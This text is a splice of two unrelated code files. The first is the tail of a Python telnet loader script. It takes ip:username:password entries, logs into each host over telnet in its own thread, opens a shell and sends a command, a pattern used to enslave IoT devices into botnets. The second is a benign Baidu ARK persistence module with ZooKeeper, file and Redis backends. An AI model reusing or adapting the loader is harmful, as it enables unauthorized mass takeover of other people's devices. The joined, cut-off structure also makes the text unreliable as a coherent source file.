time.sleep(2)
else:
pass
except Exception:
tn.close()
try:
tn.send("sh" + "\n")
time.sleep(0.05)
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[32mCommand Sent!\033[37m %s"%(ip) #False possitives because thats what yall wanted lmao
time.sleep(15)
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Thread(target=sqwad, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=xinfo[2]
time.sleep(0.01)
except:
pass |
persistence.py | # -*- coding: UTF-8 -*-
################################################################################
#
# Copyright (c) 2018 Baidu.com, Inc. All Rights Reserved
#
################################################################################
"""
**persistence** 模块用于配置信息、状态信息的持久化存储。
"""
import os
import json
import time
import copy
import string
import ark.are.common as common
import ark.are.exception as exception
import ark.are.log as log
import ark.are.config as config
class PersistenceEvent(object):
    """Notification object handed to persistence watchers.

    Carries the event type, the session state, and the affected path.
    """

    class PersistState(object):
        # Connection states of the persistence backend session.
        SUSPENDED = "SUSPENDED"
        CONNECTED = "CONNECTED"
        LOST = "LOST"

    class EventType(object):
        # Kinds of node change an observer can be told about.
        CREATED = 'CREATED'
        DELETED = 'DELETED'
        CHANGED = 'CHANGED'
        CHILD = 'CHILD'
        NONE = 'NONE'

    def __init__(self, type=None, state=None, path=None):
        # Falsy arguments fall back to neutral defaults, matching the
        # original `or`-based initialisation.
        self.type = type if type else PersistenceEvent.EventType.NONE
        self.state = state if state else PersistenceEvent.PersistState.LOST
        self.path = path if path else ""
class BasePersistence(common.Singleton):
    """
    Abstract persistence base class: defines the standard persistence API and
    provides singleton behaviour via common.Singleton.

    .. Note:: data is stored as a tree of nodes addressed by slash paths.
    """
    # Configuration key names read by concrete subclasses.
    PERSIST_MODE_NAME = "PERSIST_MODE"
    PERSIST_INTERVAL_NAME = "PERSIST_INTERVAL"
    PERSIST_TIMEOUT_NAME = "PERSIST_TIMEOUT"
    PERSIST_PARAMETERS_NAME = "PERSIST_PARAMETERS"

    def get_data(self, path):
        """
        Return the data stored at node ``path``.

        :param str path: node path
        :return: node data
        :rtype: str
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def save_data(self, path, data):
        """
        Store ``data`` at node ``path``.

        :param str path: node path
        :param str data: data to store
        :return: None
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def delete_node(self, path, force=False):
        """
        Delete the node at ``path``.

        :param str path: node path
        :param bool force: delete without validating the node first
        :return: None
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def get_children(self, path, watcher=None, include_data=False):
        """
        List the children of ``path``; optionally register ``watcher``.

        :param str path: parent node path
        :param watcher: callable(event); event has path, state, and type
            (one of CREATED|DELETED|CHANGED|CHILD|NONE)
        :param bool include_data: also return each child's data
        :return: child node names
        :rtype: list
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def create_node(self, path, value="",
                    ephemeral=False, sequence=False, makepath=False):
        """
        Create a node with the given attributes.

        :param str path: node path to create
        :param str value: initial data
        :param bool ephemeral: create an ephemeral (auto-expiring) node
        :param bool sequence: append an auto-allocated sequence number
        :param bool makepath: create missing parent nodes
        :return: the created node's path
        :rtype: str
        :raises: exception.EPNoNodeError if a parent node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def exists(self, path):
        """
        Return whether a node exists at ``path``.

        :param str path: node path to check
        :return: True if the node exists, False otherwise
        :rtype: bool
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def add_listener(self, watcher):
        """
        Register a session-state listener.

        :param watcher: callable(state); state is one of "SUSPENDED",
            "CONNECTED", "LOST"
        :return: None
        :raises: exception.EPIOError on I/O failure
        """
        raise exception.ENotImplement("function is not implement")

    def disconnect(self):
        """
        Actively close the persistence session.

        :return: None
        """
        raise exception.ENotImplement("function is not implement")
class PlainPersistence(BasePersistence):
    """
    Base class for persistence built on generic storage (file system, redis,
    ...): polls in a background thread, refreshes ephemeral-node timestamps,
    and fires watcher events by diffing node state between polls.

    Real node data lives in a ``.data`` child; ephemeral sequence numbers in
    ``.sequence``. Ephemeral nodes are touched periodically to stay fresh;
    stale ones are removed automatically. (Python 2 code: string.atof,
    iteritems, long.)
    """
    # Class-level flag: True once the singleton instance has been initialised.
    _init = False

    def __init__(self):
        """
        Initialise poller state and start the background session thread.
        """
        import threading
        if self._init:
            return
        self._initf()
        self._lock = threading.Lock()
        self._inspect_results = {}
        self._ob_paths = {}  # paths observed for child/data changes
        self._touch_paths = {}  # ephemeral node paths that must be touched
        self._interval = string.atof(config.GuardianConfig.get(self.PERSIST_INTERVAL_NAME, "0.4"))
        self._timeout = string.atof(config.GuardianConfig.get(self.PERSIST_TIMEOUT_NAME, "3"))
        self._session_thread = threading.Thread(target=self._thread_run)
        self._init = True
        self._session_thread.setDaemon(True)
        self._session_thread.start()

    def __del__(self):
        """
        Destructor: stop the poll thread and drop watch/touch records.
        """
        self.disconnect()

    def delete_node(self, path, force=False):
        """
        Delete the node at ``path``, dropping related watch/touch records.

        :param str path: node path
        :param bool force: delete without validating the node first
        :return: None
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        self._del_record_when_delnode(path)
        self._del_node(path, force)
        log.d("delete node success, path:{path}".format(path=path))

    def get_children(self, path, watcher=None, include_data=False):
        """
        List the children of ``path``; optionally register a one-shot watcher.

        :param str path: parent node path
        :param watcher: callable(event); event has path, state, and type
        :param bool include_data: also return each child's data
        :return: child names (or (name, data) pairs when include_data)
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        chd = self._valid_chd(path, include_data)
        if not include_data:
            node_list = chd.keys()
        else:
            node_list = chd.items()
        if watcher:
            if not callable(watcher):
                raise exception.ETypeMismatch("watcher must callable")
            self._new_ob(path, watcher)
        return node_list

    def disconnect(self):
        """
        Stop polling and forget every watched/touched path.

        :return: None
        """
        self._init = False
        with self._lock:
            self._ob_paths = {}
            self._touch_paths = {}
        log.d("disconnect success")

    def _initf(self):
        """
        Subclass hook: backend-specific initialisation.
        :return:
        """
        raise exception.ENotImplement("function is not implement")

    def _del_node(self, path, force):
        """
        Subclass hook: physically delete a node.
        :return:
        """
        raise exception.ENotImplement("function is not implement")

    def _valid_chd(self, path, include_data=False):
        """
        Subclass hook: return the valid (non-expired) children of ``path``.
        :return:
        """
        raise exception.ENotImplement("function is not implement")

    def _valid_node(self, path):
        """
        Subclass hook: return valid node data.
        :return:
        """
        raise exception.ENotImplement("function is not implement")

    def _refresh(self, obpath):
        """
        Return the current snapshot of ``obpath``; this default reports a
        non-existent node (subclasses override with a real snapshot).
        """
        result = {"exist": False, "md5": None, "children": {}}
        return result

    def _touch(self, tp, now):
        """
        Subclass hook: refresh an ephemeral node's timestamp and clean up
        expired ephemeral nodes.
        """
        raise exception.ENotImplement("function is not implement")

    def _inspect(self, obpath, watcher):
        """
        Diff the current snapshot of ``obpath`` against the previous one and
        fire ``watcher`` with the matching event; once an event fires the
        path is dropped from observation (one-shot watch).
        """
        result = self._refresh(obpath)
        if obpath not in self._inspect_results:
            self._inspect_results[obpath] = result
            last_result = {"exist": False, "md5": None, "children": {}}
        else:
            last_result = self._inspect_results[obpath]
        # Existence transition?
        if last_result["exist"] != result["exist"]:
            if result["exist"]:
                # With the current public API a CREATED event cannot actually
                # occur: get_children raises when the path does not exist.
                watcher(PersistenceEvent(type=PersistenceEvent.EventType.CREATED,
                                         state=PersistenceEvent.PersistState.CONNECTED,
                                         path=obpath))
            else:
                watcher(PersistenceEvent(type=PersistenceEvent.EventType.DELETED,
                                         state=PersistenceEvent.PersistState.CONNECTED,
                                         path=obpath))
            self._ignore(obpath)
            return
        # Data changed?
        if last_result["md5"] != result["md5"]:
            watcher(PersistenceEvent(type=PersistenceEvent.EventType.CHANGED,
                                     state=PersistenceEvent.PersistState.CONNECTED,
                                     path=obpath))
            self._ignore(obpath)
            return
        last_result.keys()  # NOTE(review): no-op statement, result unused
        # Child set changed?
        if len(last_result["children"]) != len(result["children"]) or\
            len(set(last_result["children"].keys()) - set(result["children"].keys())) != 0:
            watcher(PersistenceEvent(type=PersistenceEvent.EventType.CHILD,
                                     state=PersistenceEvent.PersistState.CONNECTED,
                                     path=obpath))
            self._ignore(obpath)
            return
        return

    def _ignore(self, obpath):
        """
        Stop observing ``obpath`` (used after a one-shot event fired).
        """
        self._del_ob(obpath)

    def _thread_run(self):
        """
        Poll loop: touch every ephemeral path, inspect every observed path,
        then sleep for the configured interval; runs until disconnect().
        """
        while self._init:
            with self._lock:
                ob_paths = copy.copy(self._ob_paths)
                touch_paths = copy.copy(self._touch_paths)
            now = long(time.time())
            for tp in touch_paths:
                self._touch(tp, now)
            for obp, watcher in ob_paths.iteritems():
                self._inspect(obp, watcher)
            time.sleep(self._interval)

    def _new_touch(self, path):
        """
        Register ``path`` as an ephemeral node needing periodic touches.
        """
        with self._lock:
            if not self._init:
                return
            self._touch_paths[path] = ""

    def _new_ob(self, path, watcher):
        """
        Register ``path`` for change observation with ``watcher``.
        """
        with self._lock:
            if not self._init:
                return
            self._ob_paths[path] = watcher

    def _del_touch(self, path):
        """
        Unregister an ephemeral path from the touch list.
        """
        with self._lock:
            self._touch_paths.pop(path)

    def _del_ob(self, path):
        """
        Unregister an observed path and drop its cached snapshot.
        """
        with self._lock:
            self._ob_paths.pop(path)
            self._inspect_results.pop(path)
        return

    def _del_record_when_delnode(self, path):
        """
        Drop every touch/observe record under ``path`` once it is deleted.
        """
        with self._lock:
            for k in list(self._touch_paths):
                if k.startswith(path):
                    self._touch_paths.pop(k)
            for k in list(self._ob_paths):
                if k.startswith(path):
                    self._ob_paths.pop(k)
                    # NOTE(review): pops `path`, not `k` -- looks suspicious
                    # (KeyError risk when `path` itself was never inspected);
                    # verify against callers before changing.
                    self._inspect_results.pop(path)
# Alias -- presumably kept for callers that import the older name; confirm
# before removing.
PersistenceDriver = BasePersistence
class ZkPersistence(BasePersistence):
    """
    Zookeeper-backed persistence: wraps kazoo node create/read/write/delete
    for guardian runtime-state storage and crash recovery.
    """
    # Class-level flag: True once the shared kazoo session has been started.
    _init = False

    def __init__(self):
        """
        Create and start the shared kazoo session (singleton-guarded).
        """
        if ZkPersistence._init:
            return
        self._client = ZkPersistence._new_session()
        self._client.start()
        ZkPersistence._init = True

    @classmethod
    def _run_catch(cls, func):
        """
        Run ``func`` and translate kazoo exceptions into ARK exceptions.
        """
        import kazoo
        try:
            return func()
        except kazoo.exceptions.NoNodeError:
            raise exception.EPNoNodeError()
        except kazoo.exceptions.ZookeeperError:
            log.f("zk fail")
            raise exception.EPServerError()
        except Exception as e:
            # Fix: message previously misspelt as "Requesst I/O Error".
            log.r(exception.EPIOError(), "Request I/O Error")

    @classmethod
    def _new_session(cls):
        """
        Build a kazoo.client.KazooClient from guardian configuration.

        :return: kazoo.client.KazooClient instance
        :rtype: kazoo.client.KazooClient
        :raises: exception.EPConnectTimeout on connect timeout
        """
        # Import kazoo lazily so it is only required when ZK is used.
        from kazoo import client
        hosts = config.GuardianConfig.get(config.STATE_SERVICE_HOSTS_NAME)
        params = json.loads(config.GuardianConfig.get(cls.PERSIST_PARAMETERS_NAME, '{}'))
        return ZkPersistence._run_catch(lambda: (client.KazooClient(hosts=hosts, **params)))

    def get_data(self, path):
        """
        Return the data stored at node ``path``.

        :param str path: node path
        :return: node data
        :rtype: str
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on connection failure
        """
        return ZkPersistence._run_catch(lambda: (self._client.get(path)[0]))

    def save_data(self, path, data):
        """
        Store ``data`` at node ``path``.

        :param str path: node path
        :param str data: data to store
        :return: None
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on connection failure
        """
        ZkPersistence._run_catch(lambda: (self._client.set(path, data)))
        log.d("save data success, path:{path}, data:{data}".format(path=path, data=data))

    def delete_node(self, path, force=False):
        """
        Recursively delete ``path``; ``force`` skips exception translation.

        :param str path: node path
        :param bool force: delete without exception mapping
        :return: None
        """
        if force:
            self._client.delete(path=path, recursive=True)
        else:
            self._run_catch(lambda: (self._client.delete(path=path, recursive=True)))
        log.d("delete node success, path:{path}".format(path=path))

    def get_children(self, path, watcher=None, include_data=False):
        """
        List children of ``path``. ``watcher`` is wrapped so kazoo states are
        translated into PersistenceEvent states before being delivered.

        :param str path: parent node path
        :param watcher: callable(event); event has path, state, and type
        :param bool include_data: also return each child's data
        :return: child node names
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        def dec(zkevent):
            # Map kazoo connection states onto ARK PersistState values.
            if zkevent.state == "CONNECTED" or zkevent.state == "CONNECTED_RO":
                state = PersistenceEvent.PersistState.CONNECTED
            elif zkevent.state == "CONNECTING":
                state = PersistenceEvent.PersistState.SUSPENDED
            else:
                state = PersistenceEvent.PersistState.LOST
            event = PersistenceEvent(zkevent.type, state, zkevent.path)
            return watcher(event)
        return ZkPersistence._run_catch(
            lambda: (self._client.get_children(path, watcher and dec, include_data)))

    def create_node(self, path, value="", ephemeral=False, sequence=False, makepath=False):
        """
        Create a node and return its (possibly sequence-suffixed) path.

        :param str path: node path
        :param str value: initial data
        :param bool ephemeral: create an ephemeral node
        :param bool sequence: append an auto-allocated sequence number
        :param bool makepath: create missing parent nodes
        :return: the created node's path
        :rtype: str
        :raises: exception.EPNoNodeError if a parent node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        node_path = ZkPersistence._run_catch(lambda: (self._client.create(path, value, None,
                                                                          ephemeral, sequence,
                                                                          makepath)))
        log.d("create node success, path:{path}, value:{value}, ephemeral:"
              "{ephemeral}, sequence:{sequence}, makepath:{makepath}".format(
                  path=node_path, value=value,
                  ephemeral=ephemeral, sequence=sequence,
                  makepath=makepath))
        return node_path

    def exists(self, path):
        """
        Return whether a node exists at ``path``.

        :param str path: node path
        :return: True or False (kazoo stat result)
        :rtype: bool
        :raises: exception.EPIOError on I/O failure
        """
        return ZkPersistence._run_catch(lambda: (self._client.exists(path)))

    def add_listener(self, watcher):
        """
        Register ``watcher(state)`` for session state changes; state is one
        of "SUSPENDED", "CONNECTED", "LOST".

        :return: None
        :raises: exception.EPIOError on I/O failure
        """
        def dec(zkstate):
            state = zkstate
            return watcher(state)
        ZkPersistence._run_catch(lambda: (self._client.add_listener(watcher and dec)))
        log.d("add listener success")

    def disconnect(self):
        """
        Close the kazoo session.

        :return: None
        """
        ZkPersistence._run_catch(lambda: (self._client.close()))
        log.d("disconnect success")
class FilePersistence(PlainPersistence):
    """
    File-system backed persistence.

    A real node is a directory whose data lives in the directory's ``.data``
    file. An ephemeral node is a plain file holding its own data; ephemeral
    files are touched periodically to stay fresh and expired ones are deleted
    when listed or read.
    """
    # Default creation mode as an octal string (parsed base 8 in _initf).
    _file_mode = "0755"

    def _initf(self):
        """
        Resolve the base directory from config and create it if absent.
        :return:
        """
        self._base = config.GuardianConfig.get(config.STATE_SERVICE_HOSTS_NAME)
        self._mode = string.atoi(config.GuardianConfig.get(self.PERSIST_MODE_NAME, self._file_mode), 8)
        if not os.path.exists(self._base):
            os.makedirs(self._base, self._mode)

    def _del_node(self, path, force):
        """
        Delete the node at ``path`` (directory tree or single file).

        :param str path: node path relative to the base directory
        :return None
        """
        ospath = self._base + path
        def _delall():
            """
            Remove the directory tree or file backing the node.
            :return:
            """
            if os.path.isdir(ospath):
                import shutil
                shutil.rmtree(ospath, True)
            else:
                os.remove(ospath)
        if force:
            _delall()
        else:
            self._run_catch(_delall, path)

    def _touch(self, tp, now):
        """
        Bump an ephemeral file's mtime; drop the record if the file vanished.
        """
        ospath = self._base + tp
        if not os.path.exists(ospath) or not os.path.isfile(ospath):
            self._del_record_when_delnode(tp)
            return
        # Refresh the ephemeral node's timestamp.
        os.utime(ospath, None)

    def _valid_chd(self, path, include_data=False):
        """
        List children of ``path``, deleting expired ephemeral files along the
        way; child data is fetched only when ``include_data`` is set.
        """
        def _valid():
            valid_time = time.time() - self._timeout
            ospath = self._base + path
            result = {}
            for node_name in os.listdir(ospath):
                if node_name == ".data" or node_name == ".sequence":
                    continue
                file_name = "/".join([ospath, node_name])
                node_name = "/".join([path, node_name])
                if os.path.isfile(file_name):
                    mtime = os.stat(file_name).st_mtime
                    if mtime < valid_time:
                        self.delete_node(node_name, True)
                        continue
                if not include_data:
                    result[node_name] = ""
                else:
                    data = self.get_data(node_name)
                    result[node_name] = data
            return result
        return self._run_catch(_valid, path, True)

    def _refresh(self, path):
        """
        Snapshot ``path``: existence, data md5, and child-name set (with the
        two internal ``.data``/``.sequence`` entries removed).
        """
        obpath = self._base + path
        result = {}
        if self.exists(path):
            result["exist"] = True
            import hashlib
            data = self.get_data(path)
            md5 = hashlib.md5()
            md5.update(data)
            result["md5"] = md5.hexdigest()
            result["children"] = set([name for name in os.listdir(obpath)])
            if ".data" in result["children"]:
                result["children"].remove(".data")
            if ".sequence" in result["children"]:
                result["children"].remove(".sequence")
        else:
            result["exist"] = False
            result["md5"] = None
            result["children"] = {}
        return result

    def _run_catch(self, func, path, path_is_dir=False):
        """
        Run ``func`` after validating ``path`` (expiring stale ephemeral
        files on the way); translate file-system errors into ARK exceptions.
        """
        ospath = self._base + path
        try:
            if os.path.exists(ospath):
                if path_is_dir:
                    if os.path.isdir(ospath):
                        return func()
                else:
                    if os.path.isfile(ospath):
                        # Expired ephemeral file: delete it and fall through
                        # to the "no node" error below.
                        mtime = os.stat(ospath).st_mtime
                        if mtime < time.time() - self._timeout:
                            self.delete_node(path, True)
                        else:
                            return func()
                    else:
                        return func()
            raise exception.EPNoNodeError()
        except exception.EPNoNodeError as e:
            log.r(e, "Node not exist:{}".format(path))
        except Exception as e:
            log.r(exception.EPIOError(), "Request I/O Error")

    def get_data(self, path):
        """
        Return the node's data: directory nodes read ``.data``; file
        (ephemeral) nodes read the file itself; a missing data file yields "".

        :param str path: node path
        :return: node data
        :rtype: str
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        ospath = self._base + path
        def _readdata():
            if os.path.isdir(ospath):
                file_path = "/".join((ospath, ".data"))
            else:
                file_path = ospath
            if not os.path.exists(file_path):
                return ""
            with open(file_path, 'r') as f:
                return f.read()
        return self._run_catch(_readdata, path)

    def save_data(self, path, data):
        """
        Write ``data`` into the node's backing file.

        :param str path: node path
        :param str data: data to store
        :return: None
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        ospath = self._base + path
        def _writedata():
            if os.path.isdir(ospath):
                file_path = "/".join((ospath, ".data"))
            else:
                file_path = ospath
            with open(file_path, 'w') as f:
                return f.write(data)
        self._run_catch(_writedata, path)
        log.d("save data success, path:{path}".format(path=path))

    @classmethod
    def _seq_file_name(cls, ospath, value):
        """
        Allocate the next sequence number under ``ospath``'s directory, write
        ``value`` into the new sequenced file, and return its path. The max
        sequence is persisted in ``.sequence``; the whole allocation is
        guarded by an exclusive (non-blocking) flock on that file.
        """
        import re
        import fcntl
        dirname = os.path.dirname(ospath)
        basename = os.path.basename(ospath)
        max_sn = -1
        with open("/".join((dirname, ".sequence")), 'a+') as f:
            f.seek(0)
            try:
                max_sn = string.atoi("0" + f.read(11))
            except ValueError:
                pass
            # Lock to make the sequence-id increment transactional.
            fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
            try:
                # Scan siblings whose name is basename + an all-digit suffix
                # and remember the largest suffix seen.
                for name in os.listdir(dirname):
                    if name == ".data" or name == ".sequence":
                        continue
                    if len(name) < len(basename) or name[0:len(basename)] != basename:
                        continue
                    sn = name[len(basename):]
                    if not re.match("[0-9]+$", sn):
                        continue
                    sn = string.atoi(sn)
                    if sn > max_sn:
                        max_sn = sn
                # Persist max+1 and create the new sequenced node file.
                f.seek(0)
                f.truncate()
                f.write("%d" % (max_sn + 1))
                file_path = ospath + ("%09d" % (max_sn + 1))
                with open(file_path, 'w') as node:
                    node.write(value)
            finally:
                fcntl.flock(f, fcntl.LOCK_UN)
        return ospath + ("%09d" % (max_sn + 1))

    def create_node(self, path, value="", ephemeral=False, sequence=False, makepath=False):
        """
        Create a node. Ephemeral nodes become files (registered for periodic
        touching); persistent nodes become directories with a ``.data`` file.

        :param str path: node path
        :param str value: initial data
        :param bool ephemeral: create an ephemeral node
        :param bool sequence: append an auto-allocated sequence number
        :param bool makepath: create missing parent nodes
        :return: the created node's path
        :rtype: str
        :raises: exception.EPNoNodeError if a parent node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        ospath = self._base + path
        try:
            if ephemeral:
                # Ephemeral node: represented directly by a file.
                dirname = os.path.dirname(ospath)
                if not os.path.exists(dirname):
                    if makepath:
                        os.makedirs(dirname, self._mode)
                    else:
                        raise exception.EPNoNodeError
                file_path = ospath
                if sequence:
                    file_path = self._seq_file_name(ospath, value)
                else:
                    with open(file_path, 'w') as f:
                        f.write(value)
                self._new_touch(file_path[len(self._base):])
            else:
                # Persistent node: a directory whose data lives in .data.
                if not os.path.exists(ospath):
                    if not os.path.exists(os.path.dirname(ospath)) and not makepath:
                        raise exception.EPNoNodeError
                    os.makedirs(ospath, self._mode)
                file_path = "/".join((ospath, ".data"))
                with open(file_path, 'w') as f:
                    f.write(value)
            node_path = file_path[len(self._base):]
        except exception.EPNoNodeError as e:
            log.r(e, "Node not exist:{}".format(os.path.dirname(path)))
        except Exception as e:
            log.r(exception.EPIOError(), "Request I/O Error")
        log.d("create node success, path:{path}, value:{value}, ephemeral:"
              "{ephemeral}, sequence:{sequence}, makepath:{makepath}".format(
                  path=node_path, value=value,
                  ephemeral=ephemeral, sequence=sequence,
                  makepath=makepath))
        return node_path

    def exists(self, path):
        """
        Return whether the node's backing path exists.

        :param str path: node path
        :return: True or False
        :rtype: bool
        """
        ospath = self._base + path
        return os.path.exists(ospath)

    def add_listener(self, watcher):
        """
        Session-state listeners are meaningless for local files: no-op.

        :return: None
        """
        log.i("nothing to do in FilePersistence.add_listener()")
class RedisPersistence(PlainPersistence):
    """
    Redis-backed persistence.

    Layout chosen so it also works on Redis deployments without the KEYS
    command (mirrors FilePersistence's structure):
      1. every node is a redis Hash (like a FilePersistence directory)
      2. node data is stored in the ``.data`` hash field
      3. other non-dot fields name the node's children (value = expiry time);
         each child's data lives in that child's own Hash under ``.data``
      4. the ephemeral sequence counter is the ``.sequence`` field
      5. creating/deleting a node touches both the parent Hash and the child
         key, so those operations run as atomic lua scripts
    Ephemeral nodes carry an expiry that is refreshed periodically; expired
    ones are validated only when children are listed.
    """

    def _initf(self):
        """
        Open the redis session and register the lua scripts.
        """
        self._handle = self._new_session()
        self._load_scripts()

    @classmethod
    def _split_node_name(cls, node_path):
        """
        Split ``node_path`` into its parent path and node name; the parent of
        a top-level node is "/".

        :return: (parent_path, node_name)
        :rtype: (path, name)
        """
        result = node_path.rsplit("/", 1)
        if result[0] == "":
            result[0] = "/"
        return result[0], result[1]

    @classmethod
    def _new_session(cls):
        """
        Build a redis.client.Redis instance from guardian configuration.

        :return: redis.client.Redis instance
        :rtype: redis.client.Redis
        :raises: exception.EPConnectTimeout on connect timeout
        """
        # Import redis lazily so it is only required when redis is used.
        import redis
        redis_url = config.GuardianConfig.get(config.STATE_SERVICE_HOSTS_NAME)
        params = json.loads(config.GuardianConfig.get(cls.PERSIST_PARAMETERS_NAME, "{}"))
        return RedisPersistence._run_catch(lambda: (redis.StrictRedis.from_url(redis_url, **params)))

    def _load_scripts(self):
        """
        Load the create/delete/refresh lua scripts and keep their SHAs.
        """
        # Args: KEYS[1]=parent path, KEYS[2]=child name, ARGV[1]=node data,
        # ARGV[2]=sequence flag (0 or 1), ARGV[3]=expiry time (0 = persist).
        # Negative return values signal errors.
        new_node_script = """
        local node_name = KEYS[2]
        local ret = redis.call('ttl', KEYS[1])
        if ret ~= -1 then
            return -1
        end
        if tostring(ARGV[2]) ~= "0" then
            local seq = redis.call('hincrby', KEYS[1], '.sequence', '1')
            node_name = string.format('%s%d', node_name, seq)
        end
        local expire_time = tonumber(ARGV[3])
        local node_path = string.format('%s/%s', KEYS[1], node_name)
        local ret = redis.call('hsetnx', KEYS[1], node_name, tostring(expire_time))
        if ret ~= 1
        then
            return -2
        end
        ret = redis.call('hsetnx', node_path, '.data', ARGV[1])
        if ret ~= 1
        then
            redis.call('hdel', KEYS[1], node_name)
            return -3
        end
        if expire_time ~= 0 then
            redis.call('expireat', node_path, expire_time)
        end
        return node_path
        """
        # Args: KEYS[1]=parent path, KEYS[2]=child name. Returns -1 on error.
        delete_node_script = """
        local node_path = string.format('%s/%s', KEYS[1], KEYS[2])
        local ret = redis.call('hlen', node_path)
        if ret == 0 then
            redis.call('hdel', KEYS[1], KEYS[2])
            redis.call('del', node_path)
            return 1
        elseif ret < 3
        then
            local result = redis.call('hgetall', node_path)
            local fst_c = string.byte(result[1], 1)
            if #result < 3 then
                result[3] = '.'
            end
            local snd_c = string.byte(result[3], 1)
            if ( fst_c == 46 and snd_c == 46 )
            then
                redis.call('hdel', KEYS[1], KEYS[2])
                redis.call('del', node_path)
                return 1
            end
        end
        return -1
        """
        # Args: KEYS[1]=parent path, KEYS[2]=child name, ARGV[1]=expiry time.
        # Returns -1 on error.
        # Fix: the script previously called 'hexist', which is not a Redis
        # command (the command is HEXISTS), so every refresh errored out.
        refresh_node_script = """
        local node_path = string.format('%s/%s', KEYS[1], KEYS[2])
        if redis.call('hexists', KEYS[1], KEYS[2]) == 0 then
            return -1
        end
        if redis.call('ttl', node_path) <0 then
            return -1
        end
        local ret = redis.call('expireat', node_path, ARGV[1])
        if ret == 1
        then
            redis.call('hset', KEYS[1], KEYS[2], ARGV[1])
            return 1
        else
            return -1
        end
        """
        self._new_lua_sha = self._handle.script_load(new_node_script)
        self._delete_lua_sha = self._handle.script_load(delete_node_script)
        self._refresh_lua_sha = self._handle.script_load(refresh_node_script)

    def _valid_chd(self, path, include_data=False):
        """
        List children of ``path``, deleting expired ephemeral nodes on the
        way; child data is fetched only when ``include_data`` is set.
        """
        def _valid():
            handle = self._handle
            valid_time = time.time() - self._timeout
            # For performance, the existence of `path` is not checked here.
            chd = handle.hgetall(path)
            result = {}
            for k, v in chd.iteritems():
                # Skip the internal dot-prefixed fields.
                if k[0:1] == ".":
                    continue
                chd_path = path + "/" + k
                # Drop expired ephemeral children.
                try:
                    if v == "":
                        v = "0"
                    tm = float(v)
                except ValueError:
                    continue
                if v != "0" and tm < valid_time:
                    self.delete_node(chd_path, True)
                    continue
                value = ""
                # Optionally fetch the child's data.
                if include_data:
                    value = self.get_data(chd_path)
                result[k] = value
            return result
        return self._run_catch(_valid, path, True)

    def _refresh(self, obpath):
        """
        Snapshot ``obpath``: existence, data md5, and child-name set (with
        the two internal ``.data``/``.sequence`` fields removed).
        """
        result = {}
        if self.exists(obpath):
            result["exist"] = True
            import hashlib
            nodes = self._run_catch(lambda: (self._handle.hgetall(obpath)))
            if ".data" in nodes:
                data = nodes[".data"]
            else:
                data = ""
                nodes[".data"] = ""
            md5 = hashlib.md5()
            md5.update(data)
            result["md5"] = md5.hexdigest()
            result["children"] = set(nodes.keys())
            if ".data" in result["children"]:
                result["children"].remove(".data")
            if ".sequence" in result["children"]:
                result["children"].remove(".sequence")
        else:
            result["exist"] = False
            result["md5"] = None
            result["children"] = {}
        return result

    def _touch(self, tp, now):
        """
        Push an ephemeral node's expiry forward; drop the touch record if the
        node no longer exists.
        """
        path, node_name = self._split_node_name(tp)
        try:
            ret = self._handle.evalsha(self._refresh_lua_sha, 2, path, node_name, now)
            if ret == -1:
                self._del_record_when_delnode(tp)
        except Exception as e:
            self._del_record_when_delnode(tp)

    @classmethod
    def _run_catch(cls, func, path="", path_is_dir=False):
        """
        Run ``func`` and translate redis exceptions into ARK exceptions.
        """
        import redis
        # noinspection PyBroadException
        try:
            return func()
        except redis.exceptions.ConnectionError:
            raise exception.EPConnectTimeout()
        except exception.EPNoNodeError as e:
            raise e
        except Exception as e:
            log.r(exception.EPIOError(), "Request I/O Error")

    def get_data(self, path):
        """
        Return the node's data (the ``.data`` hash field).

        :param str path: node path
        :return: node data
        :rtype: str
        :raises: exception.EPNoNodeError if the node does not exist
        :raises: exception.EPIOError on I/O failure
        """
        handle = self._handle
        def _readdata():
            value = handle.hget(path, ".data")
            if value == "" or value:
                return value
            else:
                raise exception.EPNoNodeError
        return self._run_catch(_readdata)

    def save_data(self, path, data):
        """
        Write ``data`` into the node's ``.data`` hash field.

        :param str path: node path
        :param str data: data to store
        :return: None
        :raises: exception.EPIOError on I/O failure
        """
        handle = self._handle
        def _writedata():
            # Node existence is not validated (no cheap atomic way here);
            # the data is set unconditionally.
            handle.hset(path, ".data", data)
        self._run_catch(_writedata)
        log.d("save data success, path:{path}".format(path=path))

    def _del_node(self, np, force):
        """
        Delete the node at ``np`` and all of its children (depth-first).

        :param str np: node path to delete
        :return None
        """
        def _deletenode(path=np):
            # Recurse into children first, then remove this node atomically.
            children = self.get_children(path)
            for child_node in children:
                _deletenode("/".join([path, child_node]))
            node_path, node_name = self._split_node_name(path)
